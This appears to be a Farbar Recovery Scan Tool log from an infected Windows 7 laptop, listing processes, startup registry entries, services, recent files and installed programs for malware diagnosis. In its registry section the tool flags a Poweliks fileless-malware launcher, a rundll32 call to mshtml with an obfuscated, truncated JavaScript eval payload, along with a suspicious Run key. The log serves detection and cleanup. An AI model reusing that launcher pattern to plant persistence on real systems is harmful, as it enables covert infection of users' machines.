(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Management Engine Components\UNS\UNS.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [StartCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-03-16] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [cAudioFilterAgent] => C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent.exe [496184 2010-03-23] (Conexant Systems, Inc.)
HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [480608 2009-11-06] (TOSHIBA Corporation)
HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [742712 2010-03-04] (TOSHIBA Corporation)
HKLM\...\Run: [TWebCamera] => C:\Program Files\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe [2454840 2010-02-24] (TOSHIBA CORPORATION.)
HKLM\...\Run: [IntelliPoint] => c:\Program Files\Microsoft IntelliPoint\ipoint.exe [1797008 2010-07-21] (Microsoft Corporation)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2010-11-29] (Apple Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [421160 2010-12-13] (Apple Inc.)
HKLM\...\Run: [CanonMyPrinter] => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe [2508104 2009-11-02] (CANON INC.)
HKLM\...\Run: [CanonSolutionMenu] => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.exe [767312 2009-09-04] (CANON INC.)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284440 2011-10-17] (Intel Corporation)
HKLM\...\Run: [ToshibaServiceStation] => C:\Program Files\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe [1295736 2011-02-11] (TOSHIBA Corporation)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [974432 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe [41056 2013-05-09] (Adobe Systems Incorporated)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
HKU\S-1-5-21-931387415-1679961563-2565028958-1004\...\Run: [.tluafed** <*>] => C:\Users\hesperia\Application Data\{00006159-2247-321A-78CD-B6B14BD17071}.ex <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-931387415-1679961563-2565028958-1004\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com.au/
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/
SearchScopes: HKCU - {F4ED0519-C584-4DDA-BE93-FA0B93D040F6} URL = 
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll (CANON INC.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
BHO: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll (<TOSHIBA>)
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll (Adblock Plus)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
Toolbar: HKCU - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll (Microsoft Corporation)
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll (Microsoft Corporation)
Winsock: Catalog5 09 C:\Program Files\Bonjour\mdnsNSP.dll [152864] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
 
FireFox:
========
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @canon.com/EPPEX -> C:\Program Files\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL (CANON INC.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MIF5BA~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MIF5BA~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=14.0.8117.0416 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
 
Chrome: 
=======
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 AgereModemAudio; C:\Program Files\LSI SoftModem\agrsmsvc.exe [14336 2009-03-28] (LSI Corporation)
S3 cfWiMAXService; C:\Program Files\TOSHIBA\ConfigFree\CFIWmxSvcs.exe [185712 2010-01-29] (TOSHIBA CORPORATION)
S3 ConfigFree Service; C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe [46448 2009-03-11] (TOSHIBA CORPORATION)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22192 2014-08-22] (Microsoft Corporation)
S3 MSSQL$MSSMLBIZ; c:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Binn\sqlservr.exe [29293408 2010-12-10] (Microsoft Corporation)
S4 MSSQLServerADHelper; c:\Program Files\Microsoft SQL Server\90\Shared\sqladhlp90.exe [44384 2010-12-10] (Microsoft Corporation)
S3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [288120 2014-08-22] (Microsoft Corporation)
R3 TMachInfo; C:\Program Files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe [54136 2011-02-11] (TOSHIBA Corporation)
R2 TOSHIBA eco Utility Service; C:\Program Files\TOSHIBA\TECO\TecoService.exe [189808 2010-03-17] (TOSHIBA Corporation)
S3 TOSHIBA HDD SSD Alert Service; C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe [111960 2010-02-06] (TOSHIBA Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 amdkmdag; C:\windows\System32\DRIVERS\atipmdag.sys [5340160 2010-03-15] (ATI Technologies Inc.)
R3 CnxtHdmiAudService; C:\windows\System32\drivers\CHDMI32.sys [516152 2010-03-06] (Conexant Systems Inc.)
R0 MpFilter; C:\windows\System32\DRIVERS\MpFilter.sys [231800 2014-07-17] (Microsoft Corporation)
R3 PGEffect; C:\windows\System32\DRIVERS\pgeffect.sys [24064 2009-06-23] (TOSHIBA Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-12 09:46 - 2014-09-12 09:46 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-09-10 18:08 - 2014-09-05 09:42 - 00444416 _____ (Microsoft Corporation) C:\windows\system32\aepdu.dll
2014-09-10 18:08 - 2014-09-05 09:38 - 00303104 _____ (Microsoft Corporation) C:\windows\system32\aeinv.dll
2014-09-10 17:34 - 2014-09-10 17:35 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader 9.lnk
2014-09-10 17:34 - 2014-09-10 17:35 - 00001955 _____ () C:\Users\Public\Desktop\Adobe Reader 9.lnk
2014-09-10 17:34 - 2014-09-10 17:34 - 00000000 ____D () C:\Program Files\Adobe
2014-09-10 03:01 - 2014-09-10 03:01 - 00000000 ____D () C:\windows\system32\SPReview
2014-09-09 15:25 - 2014-09-10 17:39 - 00043055 _____ () C:\Users\hesperia\Downloads\Addition.txt
2014-09-09 15:24 - 2014-09-12 15:12 - 00000000 ____D () C:\FRST
2014-09-09 15:24 - 2014-09-10 17:39 - 00022724 _____ () C:\Users\hesperia\Downloads\FRST.txt
2014-09-09 15:23 - 2014-09-09 15:23 - 01097728 _____ (Farbar) C:\Users\hesperia\Downloads\FRST.exe
2014-09-09 15:12 - 2014-09-09 15:15 - 05185536 _____ (AVAST Software) C:\Users\hesperia\Downloads\aswmbr.exe
2014-09-09 14:47 - 2014-09-09 14:47 - 00001103 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 6.lnk
2014-09-09 14:47 - 2014-09-09 14:47 - 00001091 _____ () C:\Users\Public\Desktop\TeamViewer 6.lnk
2014-09-09 14:47 - 2014-09-09 14:47 - 00000000 ____D () C:\Program Files\TeamViewer
2014-09-09 14:44 - 2014-09-09 14:44 - 00000000 ____D () C:\Program Files\Adblock Plus for IE
2014-09-09 14:41 - 2014-09-12 13:10 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-09-09 14:41 - 2014-09-09 14:41 - 00113880 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\48230029.sys
2014-09-09 14:41 - 2014-09-09 14:41 - 00001031 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-09 14:41 - 2014-09-09 14:41 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-09 14:40 - 2014-09-12 13:10 - 00000000 ____D () C:\Users\hesperia\Desktop\mbar
2014-09-09 14:40 - 2014-09-12 12:59 - 00075480 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-09-09 14:40 - 2014-09-09 14:40 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-09 14:40 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys
2014-09-09 14:33 - 2014-09-09 15:11 - 00000000 ____D () C:\Users\hesperia\Downloads\backups
2014-09-09 14:30 - 2014-09-09 14:35 - 00000000 ____D () C:\AdwCleaner
2014-09-09 14:28 - 2014-09-12 12:58 - 00000000 ____D () C:\windows\ERUNT
2014-09-09 14:24 - 2014-09-09 14:24 - 00388608 _____ (Trend Micro Inc.) C:\Users\hesperia\Downloads\HijackThis.exe
2014-09-08 18:32 - 2014-09-08 18:33 - 00232208 _____ () C:\windows\Minidump\090814-36613-01.dmp
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-12 15:12 - 2014-09-09 15:24 - 00000000 ____D () C:\FRST
2014-09-12 15:10 - 2010-12-29 12:16 - 00265897 _____ () C:\Users\hesperia\Documents\Invites.eml
2014-09-12 15:10 - 2009-07-14 12:53 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-09-12 15:10 - 2009-07-14 12:39 - 00144435 _____ () C:\windows\setupact.log
2014-09-12 13:41 - 2010-12-19 11:01 - 00685982 _____ () C:\windows\PFRO.log
2014-09-12 13:41 - 2010-11-03 08:45 - 01777622 _____ () C:\windows\WindowsUpdate.log
2014-09-12 13:40 - 2013-04-27 13:08 - 00000830 _____ () C:\windows\Tasks\Adobe Flash Player Updater.job
2014-09-12 13:10 - 2014-09-09 14:41 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-09-12 13:10 - 2014-09-09 14:40 - 00000000 ____D () C:\Users\hesperia\Desktop\mbar
2014-09-12 13:06 - 2009-07-14 12:34 - 00016080 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-12 13:06 - 2009-07-14 12:34 - 00016080 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-12 12:59 - 2014-09-09 14:40 - 00075480 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-09-12 12:59 - 2011-04-29 10:03 - 00113880 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamswissarmy.sys
2014-09-12 12:58 - 2014-09-09 14:28 - 00000000 ____D () C:\windows\ERUNT
2014-09-12 09:49 - 2011-02-23 10:13 - 00000000 ____D () C:\Users\hesperia\AppData\Local\CrashDumps
2014-09-12 09:46 - 2014-09-12 09:46 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-09-10 19:41 - 2014-07-10 08:52 - 00000000 ___SD () C:\windows\system32\CompatTel
2014-09-10 19:41 - 2012-05-01 22:36 - 00002088 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Security Essentials.lnk
2014-09-10 19:41 - 2012-04-24 14:31 - 00001945 _____ () C:\windows\epplauncher.mif
2014-09-10 19:41 - 2012-04-24 14:30 - 00000000 ____D () C:\Program Files\Microsoft Security Client
2014-09-10 19:41 - 2010-11-03 09:24 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-09-10 19:12 - 2010-11-03 09:27 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2014-09-10 17:39 - 2014-09-09 15:25 - 00043055 _____ () C:\Users\hesperia\Downloads\Addition.txt
2014-09-10 17:39 - 2014-09-09 15:24 - 00022724 _____ () C:\Users\hesperia\Downloads\FRST.txt
2014-09-10 17:35 - 2014-09-10 17:34 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader 9.lnk
2014-09-10 17:35 - 2014-09-10 17:34 - 00001955 _____ () C:\Users\Public\Desktop\Adobe Reader 9.lnk
2014-09-10 17:34 - 2014-09-10 17:34 - 00000000 ____D () C:\Program Files\Adobe
2014-09-10 17:34 - 2011-04-29 10:16 - 00000000 ____D () C:\Program Files\Common Files\Adobe
2014-09-10 17:34 - 2010-07-07 10:08 - 00000000 ____D () C:\ProgramData\Adobe
2014-09-10 17:33 - 2010-12-31 22:20 - 00000000 ____D () C:\Users\hesperia\AppData\Local\Adobe
2014-09-10 03:01 - 2014-09-10 03:01 - 00000000 ____D () C:\windows\system32\SPReview
2014-09-09 15:23 - 2014-09-09 15:23 - 01097728 _____ (Farbar) C:\Users\hesperia\Downloads\FRST.exe
2014-09-09 15:15 - 2014-09-09 15:12 - 05185536 _____ (AVAST Software) C:\Users\hesperia\Downloads\aswmbr.exe
2014-09-09 15:11 - 2014-09-09 14:33 - 00000000 ____D () C:\Users\hesperia\Downloads\backups
2014-09-09 14:47 - 2014-09-09 14:47 - 00001103 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 6.lnk
2014-09-09 14:47 - 2014-09-09 14:47 - 00001091 _____ () C:\Users\Public\Desktop\TeamViewer 6.lnk
2014-09-09 14:47 - 2014-09-09 14:47 - 00000000 ____D () C:\Program Files\TeamViewer
2014-09-09 14:44 - 2014-09-09 14:44 - 00000000 ____D () C:\Program Files\Adblock Plus for IE
2014-09-09 14:41 - 2014-09-09 14:41 - 00113880 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\48230029.sys
2014-09-09 14:41 - 2014-09-09 14:41 - 00001031 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-09 14:41 - 2014-09-09 14:41 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-09 14:40 - 2014-09-09 14:40 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-09 14:40 - 2011-04-29 10:03 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-09 14:35 - 2014-09-09 14:30 - 00000000 ____D () C:\AdwCleaner
2014-09-09 14:24 - 2014-09-09 14:24 - 00388608 _____ (Trend Micro Inc.) C:\Users\hesperia\Downloads\HijackThis.exe
2014-09-08 18:33 - 2014-09-08 18:32 - 00232208 _____ () C:\windows\Minidump\090814-36613-01.dmp
2014-09-08 18:32 - 2011-09-21 14:51 - 405289750 _____ () C:\windows\MEMORY.DMP
2014-09-08 18:32 - 2011-04-29 09:59 - 00000000 ____D () C:\windows\Minidump
2014-09-07 10:07 - 2009-07-14 10:37 - 00000000 ____D () C:\windows\system32\NDF
2014-09-07 09:40 - 2010-12-21 13:59 - 00000000 ____D () C:\Users\hesperia\AppData\Local\Apple Computer
2014-09-07 09:40 - 2010-11-03 09:33 - 00000000 ____D () C:\ProgramData\Skype
2014-09-07 09:40 - 2010-11-03 09:02 - 00000000 ____D () C:\ProgramData\Norton
2014-09-05 09:42 - 2014-09-10 18:08 - 00444416 _____ (Microsoft Corporation) C:\windows\system32\aepdu.dll
2014-09-05 09:38 - 2014-09-10 18:08 - 00303104 _____ (Microsoft Corporation) C:\windows\system32\aeinv.dll
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\windows\explorer.exe => File is digitally signed
C:\windows\system32\winlogon.exe => File is digitally signed
C:\windows\system32\wininit.exe => File is digitally signed
C:\windows\system32\svchost.exe => File is digitally signed
C:\windows\system32\services.exe => File is digitally signed
C:\windows\system32\User32.dll => File is digitally signed
C:\windows\system32\userinit.exe => File is digitally signed
C:\windows\system32\rpcss.dll => File is digitally signed
C:\windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-09-06 10:25
 
==================== End Of Log ============================
 
 
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 10-09-2014
Ran by hesperia at 2014-09-12 15:13:42
Running from E:\
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Microsoft Security Essentials (Disabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Disabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adblock Plus for IE (32-bit) (HKLM\...\{DF0E7912-4A45-4B24-B472-E521C4D2C663}) (Version: 99.9 - Eyeo GmbH)
Adobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.7.700.169 - Adobe Systems Incorporated)
Adobe Reader 9.5.5 (HKLM\...\{AC76BA86-7AD7-1033-7B44-A95000000001}) (Version: 9.5.5 - Adobe Systems Incorporated)
Apple Application Support (HKLM\...\{EE6097DD-05F4-4178-9719-D3170BF098E8}) (Version: 1.4.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{308B6AEA-DE50-4666-996D-0FA461719D6B}) (Version: 3.3.0.69 - Apple Inc.)
Apple Software Update (HKLM\...\{C41300B9-185D-475E-BFEC-39EF732F19B1}) (Version: 2.1.2.120 - Apple Inc.)
Atheros Communications Inc.® AR81Family Gigabit/Fast Ethernet Driver (HKLM\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.26 - Atheros Communications Inc.)
ATI Catalyst Install Manager (HKLM\...\{607CAF58-360F-8AB2-0E15-8B71B86E2390}) (Version: 3.0.765.0 - ATI Technologies, Inc.)
Bluetooth Stack for Windows by Toshiba (HKLM\...\{CEBB6BFB-D708-4F99-A633-BC2600E01EF6}) (Version: v7.10.10(T) - TOSHIBA CORPORATION)
Bonjour (HKLM\...\{2A981294-F14C-4F0F-9627-D793270922F8}) (Version: 2.0.4.0 - Apple Inc.)
Broadcom 802.11 Network Adapter (HKLM\...\Broadcom 802.11 Network Adapter) (Version: 5.60.48.35 - Broadcom Corporation)
BurnInTest v5.3 Pro (HKLM\...\BurnInTest_is1) (Version: 5.3 - Passmark Software)
Business Contact Manager for Outlook 2007 SP2 (HKLM\...\Business Contact Manager) (Version: 3.0.8619.1 - Microsoft Corporation)
Business Contact Manager for Outlook 2007 SP2 (Version: 3.0.8619.1 - Microsoft Corporation) Hidden
Canon Easy-WebPrint EX (HKLM\...\Easy-WebPrint EX) (Version:  - )
Canon MP Navigator EX 3.1 (HKLM\...\MP Navigator EX 3.1) (Version:  - )
Canon MX870 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX870_series) (Version:  - )
Canon Speed Dial Utility (HKLM\...\Speed Dial Utility) (Version:  - )
Canon Utilities Easy-PhotoPrint EX (HKLM\...\Easy-PhotoPrint EX) (Version:  - )
Canon Utilities My Printer (HKLM\...\CanonMyPrinter) (Version:  - )
Canon Utilities Solution Menu (HKLM\...\CanonSolutionMenu) (Version:  - )
Catalyst Control Center - Branding (Version: 1.00.0000 - ATI) Hidden
Catalyst Control Center Core Implementation (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Full New (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Light (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Previews Common (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center InstallProxy (Version: 2010.0315.1050.17562 - ATI Technologies, Inc.) Hidden
Catalyst Control Center Localization All (Version: 2010.0315.1050.17562 - ATI) Hidden
CCC Help Chinese Standard (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Chinese Traditional (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Czech (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Danish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Dutch (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help English (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Finnish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help French (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help German (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Greek (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Hungarian (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Italian (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Japanese (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Korean (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Norwegian (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Polish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Portuguese (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Russian (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Spanish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Swedish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Thai (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Turkish (Version: 2010.0315.1049.17562 - ATI) Hidden
ccc-core-static (Version: 2010.0315.1050.17562 - ATI) Hidden
ccc-utility (Version: 2010.0315.1050.17562 - ATI) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 3.05 - Piriform)
Cisco EAP-FAST Module (HKLM\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
Conexant Audio Driver For AMD HDMI Codec (HKLM\...\CNXT_AUDIO_HDA_HDMI) (Version: 4.98.26.0 - Conexant)
Conexant HD Audio (HKLM\...\CNXT_AUDIO_HDA) (Version: 4.119.0.61 - Conexant)
Corel WinDVD (HKLM\...\{5C1F18D2-F6B7-4242-B803-B5A78648185D}) (Version: 10.0.5.822 - Corel Inc.)
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{650DE870-ECA3-4E63-8D77-778512BE5D4C}) (Version:  - Microsoft)
Intel® Management Engine Components (HKLM\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.8.0.1003 - Intel Corporation)
Intel® Turbo Boost Technology Driver (HKLM\...\{D6C630BF-8DBB-4042-8562-DC9A52CB6E7E}) (Version: 01.01.01.1007 - Intel Corporation)
iTunes (HKLM\...\{881F5DE8-9367-4B81-A325-E91BBC6472F9}) (Version: 10.1.1.4 - Apple Inc.)
Java™ 6 Update 17 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83216017FF}) (Version: 6.0.170 - Sun Microsystems, Inc.)
Junk Mail filter update (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
LSI V92 MOH Application (HKLM\...\LTMOH) (Version:  - LSI Corporation)
Malwarebytes' Anti-Malware (HKLM\...\Malwarebytes' Anti-Malware_is1) (Version:  - Malwarebytes Corporation)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6012.5000 - Microsoft Corporation) Hidden
Microsoft Choice Guard (Version: 2.0.48.0 - Microsoft Corporation) Hidden
Microsoft IntelliPoint 8.0 (HKLM\...\{00F93853-D9D3-4795-A89E-84CCBA0205C9}) (Version: 8.0.225.0 - Microsoft)
Microsoft Office 2003 Web Components (HKLM\...\{90A40409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Office 2007 Primary Interop Assemblies (HKLM\...\{50120000-1105-0000-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office Access MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Converter Pack (HKLM\...\{6EECB283-E65F-40EF-86D3-D51BF02A8D43}) (Version: 11.0.0.0 - Microsoft Corporation - Office Resource Kit Group)
Microsoft Office Excel MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Home and Student 2010 (HKLM\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office OneNote MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
